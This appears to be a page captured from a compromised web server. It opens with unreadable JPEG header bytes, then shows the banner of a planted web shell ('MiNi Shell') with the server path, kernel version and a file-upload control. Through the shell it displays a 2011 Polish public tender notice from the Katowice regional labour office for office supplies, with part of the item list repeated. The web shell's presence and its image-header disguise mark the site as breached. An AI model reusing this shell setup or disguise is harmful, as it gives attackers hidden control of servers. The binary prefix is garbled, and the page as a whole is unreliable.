JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110311/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110311/80767-N-2011.html

<p class="kh_header"><b>Katowice: ZAKUP MATERIAŁÓW BIUROWYCH</b><br>
<b>Numer ogłoszenia: 80767 - 2011; data zamieszczenia: 11.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP MATERIAŁÓW BIUROWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I 
Przedmiotem zamówienia jest zakup materiałów biurowych. 

  Lp.    Asortyment*                                            Ilość       
 1.        Biuwar  z  kalendarzem  na 2012 r.     7 szt.   
2.        Bloczek samoprzylepny  38 mm x 51 mm    120 szt.    
3.        Bloczek samoprzylepny 76 mm x 76 mm    120   szt. 
4.        Bloczek samoprzylepny 76 mm x 127 mm    24  szt. 
5.        Blok makulaturowy A5 100 kartek w kratkę    60 szt.   
6.        Cienkopis o grubości linii 0,4 mm wszystkie kolory    144 szt.  
7.        Cienkopis do CD czarny o gr. linii 0,4 mm    36 szt.  
8.        Długopis automatyczny z wymiennym wkładem wielko pojemnym     60 szt.  
9.        Długopis żelowy z wymiennym wkładem ;     240 szt.  
10.        Wkład do długopisu żelowego z poz. 9    110  szt. 
11.        Długopis samoprzylepny na sprężynce z wymiennym wkładem    5 szt.   
12.        Długopis jednorazowy typu BIC kolor : czarny, niebieski, czerwony    300 szt.   
13.        Dziurkacz     13 szt.  
14.        Dziurkacz archiwizacyjny     3  szt. 
15.        Etykiety samoprzylepne  adresowe         12 op
16.        Etykiety grzbietowe o szer. 500 mm i 250 mm         50 op.
17.        Folia do faksu typu Panasonic  KX-FP  343 PD    14 szt.   
18.        Grzbiety do bindowania 6 mm         2 op.
19.        Grzbiety do bindowania 8 mm         1 op.
20.        Grzbiety do bindowania 12 mm         1 op.
21.        Grzbiety do bindowania 16  mm         2 op.
22.        Grzbiety do bindowania 25  mm         3 op.
23.        Grzbiety do bindowania   50 mm     150 szt.   
24.        Gumka kombinowana niebiesko-biała do ołówka i atramentu    30 szt.   
25.        Kalendarz na 2012 r. biurkowy stojący     210 szt.   
26.        Kalendarz na 2012 r. biurkowy leżący     10 szt.   
27.        Kalkulator z dużym 12-poz. wyświetlaczem    21 szt.    
28.        Klej w sztyfcie o wadze nie mniejszej niż 22 g     60 szt.   
29.        Klip do papieru  19 mm    432 szt.   
30.        Klips archiwizacyjny         6 op. 
31.        Koperta C4 biała samoprzylepna         25 op.
32.        Koperta biała z rozszerzanymi bokami i spodem    500 szt.   
33.        Koperta biała z rozszerzanymi bokami i spodem    500 szt.   
34.        Koperta powietrzna air poc o wym. 140x225 mm    100 szt.   
35.        Koperta powietrzna air poc o wym. 170x225 mm    200 szt.   
36.        Koperta powietrzna air poc o wym. 240x350 mm    100 szt.   
37.        Korektor w płynie ekologiczny z gąbką    30 szt.   
38.        Korektor w piórze z metalową  końcówką     60 szt.   
39.        Kostka biurowa -klejona , biała , kolorowa      50 szt.   
40.        Koszulka A5 groszek wykonana folii PP        30 op.
41.        Koszulka A4 groszek wykonana z folii PP    300 szt.   
42.        Linijka plastikowa 20 cm    10 szt.   
43.        Marker do tablic sucho ścieralnych z okrągłą końcówką     12 szt.    
44.        Marker zwykły-wszystkie kolory z okrągłą końcówką    72 szt.    
45.        Masa mocująca         10 op.
46.        Mazaki kolorowe w kompletach        30 op.. 
47.        Naboje atramentowe typu Watterman ( długie)         5 op. 
48.        Mechanizm  skoroszytowy pak. po 25 szt.        50 op.
49.        Okładki do bindowania przeźroczyste przód         7op.
50.        Papier do faksu  210x30 mm         6 op.
51.        Papier pakowy szary o gramaturze min. 50g/m2 celulozowy    20 szt. 
52.        Papier ozdobny/ wizytówkowy o gramaturze min. 200 g     400   szt. 
53.        Pióro kulkowe czarne i niebieskie      60 szt.   
54.        Pinezki kolorowe         20 op.
55.        Poduszka do stempli na kołku     2  szt.  
56.        Poduszka do stempli na kołku     1 szt.   
57.        Pudło archiwizacyjne o szerokości grzbietu 100 mm,    500  szt.  
58.        Segregator A4/75 kolor z mechanizmem dźwigniowym     450 szt.   
59.        Segregator A4/50 kolor z mechanizmem dźwigniowym    100 szt.   
60.        Segregator A5/75 kolor z mechanizmem dźwigniowym        20 szt.   
61.        Skoroszyt  tekturowy biały zwykły    50 szt.  
62.        Skoroszyt plastikowy miękki         15 op.
63.        Skoroszyt  wielooczkowy  do zawieszania w segregatorze         10 op.
64.        Spinacze plikowe         30 op.
65.        Szuflada na dokumenty pozioma - dymna lub biała    24 szt.   
66.        Szuflada na dokumenty pionowa składana z PCV    10 szt.   
67.        Tablica korkowa w ramie drewnianej     7  szt.  
68.        Tablica korkowa w ramie drewnianej     1 szt.   
69.        Taśma do przenosnych drukarek etykiet     10 szt.   
70.        Taśma pakowa przeźroczysta     6 szt.   
71.        Teczka do podpisu zawierająca co najmniej 15 kartek    15 szt.    
72.        Teczka na akta osobowe zawieszkowa z częściami  A,B,C     50 szt.   
73.        Teczka zawieszkowa biała  kartonowa         50 op. 
74.        Tusz do stempli gumowych z końcówką ułatwiającą nasączanie    40 szt.   
75.        Wałeczki barwiące do maszyn liczących     10 szt.   
76.        Zakładki indeksujące w bloczkach        50 op.
77.        Zakreślacz ze ściętą końcówką z systemem kapilarnym     180 szt.  
78.        Zeszyt A5 32 kartkowy w kratkę    45 szt.  
79.        Zeszyt A5 twarda oprawa     10 szt.  
80.        Zeszyt A4 twarda oprawa     30 szt.  
81.        Zeszyt A4 - brulion, miękka oprawa 96 kartek    40 szt.   
82.        Zszywacz  o metalowej konstrukcji z uchwytem     30 szt.  
83.        Zszywacz nożycowy    20 szt.   
84.        Zszywacz blokowy-ręczny    3 szt.    
85.        Zszywki do zszywaczy  23/10          26 op.
86.        Zszywki do zszywacza blokowego  23/15         10 op. 
*szczegółowy opis zamówienia zawarty jest w Rozdziale II SIWZ 

CZĘŚĆ II 

Przedmiotem zamówienia jest zakup materiałów biurowych współfinansowanych ze środków Pomocy Technicznej PO KL. 

L.p.               Asortyment*                      Ilość

1.    Bloczek samoprzylepny  38 mm x 51 mm    648 szt.  
2.    Bloczek samoprzylepny 76 mm x 76 mm    528  szt. 
3.    Bloczek samoprzylepny 76 mm x 127 mm    324  szt.  
4.    Blok makulaturowy A5 100 kartek w kratkę    53 szt.  
5.    Blok makulaturowy A4 100 kartek w kratkę    68 szt.  
6.    Cienkopis o grubości linii 0,4 mm     108 szt.  
7.    Cienkopis do CD czarny o gr. linii 0,4 mm    16 szt.  
8.    Długopis automatyczny     138 szt.  
9.    Wkład do długopisu opisanego w poz. 8    138 szt.   
10.    Długopis żelowy z wymiennym wkładem     223  szt. 
11.    Wkład do długopisu żelowego z poz. 10    171 szt.  
12.    Długopis samoprzylepny na sprężynce              3 szt.  
13.    Długopis jednorazowy typu BIC            173 szt.  
14.    Dziurkacz z ogranicznikiem formatu z    6 szt.  
15.    Etykiety samoprzylepne  adresowe 105x74 mm    6 op. 
16.    Etykiety grzbietowe o szer. 500 mm i 250 mm        10 op
16.I    Grzbiety do bindowania 6 mm         1 op. 
17.    Grzbiety do bindowania 8 mm         1 op. 
18.    Grzbiety do bindowania 12 mm         2 op. 
19.    Grzbiety do bindowania 16  mm         2 op. 
20.    Grzbiety do bindowania 25  mm         1 op.
21.    Grzbiety do bindowania  50 mm     150  szt.  
22.    Gumka kombinowana niebiesko-biała     63 szt.   
23.    Kalkulator z dużym 12-poz. wyświetlaczem    13 szt.   
24.    Klej w sztyfcie o wadze nie mniejszej niż 22 g     33   szt. 
25.    Klej w tubce o wadze nie mniejszej niż 50 ml    20  szt. 
26.    Klip do papieru  19 mm    180    szt. 
27.    Klip do papieru  32 mm    168  szt.  
28.    Klip do papieru  51 mm    60 szt.   
29.    Klips archiwizacyjny         4 op.
30.    Koperta C6 biała samoprzylepna         5 op. 
31.    Koperta C5 biała samoprzylepna         22 op.
32.    Koperta C4 biała samoprzylepna         32 op.
33.    Koperta biała z rozszerzanymi bokami i spodem    35 szt.   
34.    Koperta biała z rozszerzanymi bokami i spodem    116 szt.  
35.    Koperta powietrzna air poc     300 szt.  
36.    Koperta powietrzna air poc     300 szt.   
37.    Koperta powietrzna air poc     300   szt. 
38.    Korektor w płynie ekologiczny     40  szt. 
39.    Korektor w piórze z metalową  końcówką     35 szt.    
40.    Korektor w taśmie z kasetą wymienną     50 szt.   
41.    Wkład do korektora z poz. 40    50 szt.  
42.    Kostka biurowa -klejona , biała , kolorowa  8,5x8,5 mm    125 szt.  
43.    Koszulka A5 groszek wykonana folii PP               22 op. 
44.    Linijka plastikowa 20 cm    16 szt.  
45.    Linijka plastikowa 30 cm    12  szt. 
46.    Marker do tablic sucho ścieralnych z okrągłą końcówką    8 szt.   
47.    Marker zwykły-wszystkie kolory     45 szt.   
48.    Mazaki kolorowe w kompletach                   27 op.
49.    Mechanizm  skoroszytowy                 2 op.
50.    Nożyczki wykonane z nierdzewnej stali  20 cm     9 szt.  
51.    Okładki do bindowania przeźroczyste przód                 7 op.
52.    Okładki do bindowania tył karton twardy jednostronnie kolorowy        7 op.
53.    Ołówek z gumką HB                 9 op.
54.    Papier do faksu  210x30 mm                 9 op.
55.    Papier kserograficzny A4 160 g kolor                32 op.
56.    Pióro kulkowe czarne i niebieski     42    szt. 
57.    Przekładki do dokumentów z kolorowego polipropylenu formatu A4,       31 op.
58.    Pinezki kolorowe                  4 op. 
59.    Pinezki  kolorowe do tablic korkowych                7 op. 
60.    Pudło archiwizacyjne o szerokości grzbietu 100 mm    1200 szt.  
61.    Rozszywacz do dokumentów    2  szt. 
62.    Segregator A4/75 kolor z mechanizmem dźwigniowym     600  szt.  
63.    Skoroszyt tekturowy biały zwykły    10 szt.  
64.    Skoroszyt plastikowy miękki         70 op. 
65.    Skoroszyt  wielooczkowy  do zawieszania w segregatorze         68 op.
66.    Spinacze okrągłe 28 mm         20 op. 
67.    Spinacze plikowe         3 op. 
68.    Szuflada na dokumenty pozioma - dymna    16  szt. 
69.    Tablica korkowa w ramie drewnianej      1  szt.  
70.    Tablica sucho ścieralna naścienna      1  szt.  
71.    Taśma klejąca 18x10          8 op. 
72.    Taśma klejąca 24x20           12 op. 
73.    Taśma pakowa przeźroczysta 48 x 50   6 szt.   
74.    Teczka do podpisu zawierająca     10  szt.  
75.    Teczka z gumka  A4 - kolorowa    210 szt.   
76.    Teczka na rzep A4 z kartonu lakierowanego    8 szt.   
77.    Teczka zawieszkowa biała  kartonowa         4 op.
78.    Temperówka podwójna  metalowa    40 szt.    
79.    Tusz do stempli gumowych z końcówką ułatwiającą nasączanie    15    szt. 
80.    Zakładki indeksujące w bloczkach        20 op.
81.    Zakreślacz ze ściętą końcówką z systemem kapilarnym     224   szt. 
82.    Zeszyt A5 32 kartkowy w kratkę    45  szt. 
83.    Zeszyt A5 twarda oprawa 96 kartek    33 szt.   
84.    Zeszyt A4 twarda oprawa 96 kartek    20 szt.   
85.    Zeszyt A4 - brulion, miękka oprawa 96 kartek    45 szt.   
86.    Zszywacz  o metalowej konstrukcji z uchwytem     16 szt.   
87.    Zszywacz nożycowy, obudowa z metalu połączona z plastikiem    17 szt.   
88.    Zszywacz blokowy-ręczny, zszywający min. 80 kartek     1 szt.   
89.    Zszywki do zszywaczy  24/6          140 op. 
90.    Zszywki do zszywaczy  23/10          15 op. 
91.    Zszywki do zszywacza blokowego  23/15         2 op. 
*szczegółowy opis zamówienia zawarty jest w Rozdziale II SIWZ 
UWAGA
Wszystkie ilości zamawianych materiałów biurowych w części I oraz II są ilościami orientacyjnymi, określonymi w celu oszacowania wartości zamówienia oraz dokonania porównania ofert. Ilości te mogą ulec zmianie (zmniejszeniu), przy czym Wykonawca z tego tytułu nie będzie wnosił roszczeń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach
ul. Kościuszki 30
III piętro pok. 304 - 305.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2011 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach
ul. Kościuszki 30
II piętro pok. 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup współfinansowany przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach Pomocy Technicznej Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZAKUP MATERIAłóW BIUROWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I 
Przedmiotem zamówienia jest zakup materiałów biurowych. 


  Lp.    Asortyment*                                            Ilość       
 1.        Biuwar  z  kalendarzem  na 2012 r.     7 szt.   
2.        Bloczek samoprzylepny  38 mm x 51 mm    120 szt.    
3.        Bloczek samoprzylepny 76 mm x 76 mm    120   szt. 
4.        Bloczek samoprzylepny 76 mm x 127 mm    24  szt. 
5.        Blok makulaturowy A5 100 kartek w kratkę    60 szt.   
6.        Cienkopis o grubości linii 0,4 mm wszystkie kolory    144 szt.  
7.        Cienkopis do CD czarny o gr. linii 0,4 mm    36 szt.  
8.        Długopis automatyczny z wymiennym wkładem wielko pojemnym     60 szt.  
9.        Długopis żelowy z wymiennym wkładem ;     240 szt.  
10.        Wkład do długopisu żelowego z poz. 9    110  szt. 
11.        Długopis samoprzylepny na sprężynce z wymiennym wkładem    5 szt.   
12.        Długopis jednorazowy typu BIC kolor : czarny, niebieski, czerwony    300 szt.   
13.        Dziurkacz     13 szt.  
14.        Dziurkacz archiwizacyjny     3  szt. 
15.        Etykiety samoprzylepne  adresowe         12 op
16.        Etykiety grzbietowe o szer. 500 mm i 250 mm         50 op.
17.        Folia do faksu typu Panasonic  KX-FP  343 PD    14 szt.   
18.        Grzbiety do bindowania 6 mm         2 op.
19.        Grzbiety do bindowania 8 mm         1 op.
20.        Grzbiety do bindowania 12 mm         1 op.
21.        Grzbiety do bindowania 16  mm         2 op.
22.        Grzbiety do bindowania 25  mm         3 op.
23.        Grzbiety do bindowania   50 mm     150 szt.   
24.        Gumka kombinowana niebiesko-biała do ołówka i atramentu    30 szt.   
25.        Kalendarz na 2012 r. biurkowy stojący     210 szt.   
26.        Kalendarz na 2012 r. biurkowy leżący     10 szt.   
27.        Kalkulator z dużym 12-poz. wyświetlaczem    21 szt.    
28.        Klej w sztyfcie o wadze nie mniejszej niż 22 g     60 szt.   
29.        Klip do papieru  19 mm    432 szt.   
30.        Klips archiwizacyjny         6 op. 
31.        Koperta C4 biała samoprzylepna         25 op.
32.        Koperta biała z rozszerzanymi bokami i spodem    500 szt.   
33.        Koperta biała z rozszerzanymi bokami i spodem    500 szt.   
34.        Koperta powietrzna air poc o wym. 140x225 mm    100 szt.   
35.        Koperta powietrzna air poc o wym. 170x225 mm    200 szt.   
36.        Koperta powietrzna air poc o wym. 240x350 mm    100 szt.   
37.        Korektor w płynie ekologiczny z gąbką    30 szt.   
38.        Korektor w piórze z metalową  końcówką     60 szt.   
39.        Kostka biurowa -klejona , biała , kolorowa      50 szt.   
40.        Koszulka A5 groszek wykonana folii PP        30 op.
41.        Koszulka A4 groszek wykonana z folii PP    300 szt.   
42.        Linijka plastikowa 20 cm    10 szt.   
43.        Marker do tablic sucho ścieralnych z okrągłą końcówką     12 szt.    
44.        Marker zwykły-wszystkie kolory z okrągłą końcówką    72 szt.    
45.        Masa mocująca         10 op.
46.        Mazaki kolorowe w kompletach        30 op.. 
47.        Naboje atramentowe typu Watterman ( długie)         5 op. 
48.        Mechanizm  skoroszytowy pak. po 25 szt.        50 op.
49.        Okładki do bindowania przeźroczyste przód         7op.
50.        Papier do faksu  210x30 mm         6 op.
51.        Papier pakowy szary o gramaturze min. 50g/m2 celulozowy    20 szt. 
52.        Papier ozdobny/ wizytówkowy o gramaturze min. 200 g     400   szt. 
53.        Pióro kulkowe czarne i niebieskie      60 szt.   
54.        Pinezki kolorowe         20 op.
55.        Poduszka do stempli na kołku     2  szt.  
56.        Poduszka do stempli na kołku     1 szt.   
57.        Pudło archiwizacyjne o szerokości grzbietu 100 mm,    500  szt.  
58.        Segregator A4/75 kolor z mechanizmem dźwigniowym     450 szt.   
59.        Segregator A4/50 kolor z mechanizmem dźwigniowym    100 szt.   
60.        Segregator A5/75 kolor z mechanizmem dźwigniowym        20 szt.   
61.        Skoroszyt  tekturowy biały zwykły    50 szt.  
62.        Skoroszyt plastikowy miękki         15 op.
63.        Skoroszyt  wielooczkowy  do zawieszania w segregatorze         10 op.
64.        Spinacze plikowe         30 op.
65.        Szuflada na dokumenty pozioma - dymna lub biała    24 szt.   
66.        Szuflada na dokumenty pionowa składana z PCV    10 szt.   
67.        Tablica korkowa w ramie drewnianej     7  szt.  
68.        Tablica korkowa w ramie drewnianej     1 szt.   
69.        Taśma do przenośnych drukarek etykiet     10 szt.   
70.        Taśma pakowa przeźroczysta     6 szt.   
71.        Teczka do podpisu zawierająca co najmniej 15 kartek    15 szt.    
72.        Teczka na akta osobowe zawieszkowa z częściami  A,B,C     50 szt.   
